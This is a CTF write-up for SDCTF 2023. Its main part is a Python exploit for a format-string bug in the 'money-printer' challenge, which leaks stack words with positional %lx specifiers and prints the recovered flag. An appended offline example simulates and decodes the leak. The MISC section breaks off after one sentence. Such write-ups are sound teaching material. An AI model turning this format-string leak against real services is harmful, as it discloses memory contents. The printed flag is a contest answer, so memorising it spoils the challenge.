SDCTF 2023 writeup

I participated in SDCTF 2023 as Wani Hackase and took 5th place. Thank you for organizing nice CTF events!

PWN/money-printer

This binary contains a format string bug and the flag is located on the stack. I just send %i$08lx to reveal the flag as shown below.

```python
from toyotama import *

_r = Socket("nc money.sdc.tf 1337")
_r.sendlineafter("want?\n", -1000)

# Leak stack slots 10..15 as hex words via positional format specifiers
_r.sendlineafter("audience?\n", " ".join([f"%{i}$08lx" for i in range(10, 16)]))
_r.recvuntil("said: ")
flag = _r.recvline().decode().split()

# Each word is printed as a little-endian integer, so reverse its bytes
flag = b"".join([bytes.fromhex(x)[::-1] for x in flag])
flag += b"}"
print(flag)
```

sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}

MISC/Form bomb protector

After connecting to the server, it spawns a shell but we cannot use most commands since some syscalls are prohibited. It accepts bash builtin commands, so I combined some of them to read the flag. ...
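The decoding step from the money-printer solution above, as an added example that is not part of the original writeup, run offline against a constructed leak. The helper names and the sample secret are assumptions made for illustration; the example also shows that the `bytes.fromhex` approach breaks when a word prints with an odd number of hex digits, which parsing each word as an integer avoids.

```python
import struct


def simulate_printf_lx(stack_bytes: bytes) -> str:
    """Constructed stand-in for the service: render memory the way
    printf("%08lx ...") prints consecutive 8-byte little-endian slots."""
    padded = stack_bytes + b"\x00" * (-len(stack_bytes) % 8)
    words = struct.unpack(f"<{len(padded) // 8}Q", padded)
    # %08lx pads to at least 8 digits but never truncates, so a word can
    # come out with any length from 8 to 16 digits, including odd lengths.
    return " ".join(f"{w:08x}" for w in words)


def naive_decode(line: str) -> bytes:
    """Same approach as the writeup: hex-decode each word, then reverse it."""
    return b"".join(bytes.fromhex(tok)[::-1] for tok in line.split())


def decode_leak(line: str) -> bytes:
    """Parse each word as an integer and re-serialise it as 8 little-endian
    bytes, so dropped leading zeros and odd digit counts are handled."""
    out = b"".join(int(tok, 16).to_bytes(8, "little") for tok in line.split())
    # Only padding after the end of the string is removed.
    return out.rstrip(b"\x00")


# Constructed sample: 22 bytes, so the last slot is partial and its top
# non-zero byte is 0x0a, which prints as a single hex digit.
SECRET = b"demo{constructed_val}\n"
LEAK = simulate_printf_lx(SECRET)

if __name__ == "__main__":
    print("leaked words:", LEAK)
    try:
        print("naive :", naive_decode(LEAK))
    except ValueError as exc:
        print("naive decode failed:", exc)
    print("robust:", decode_leak(LEAK))
```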

2023-05-11 · 11 min · 2315 words · Laika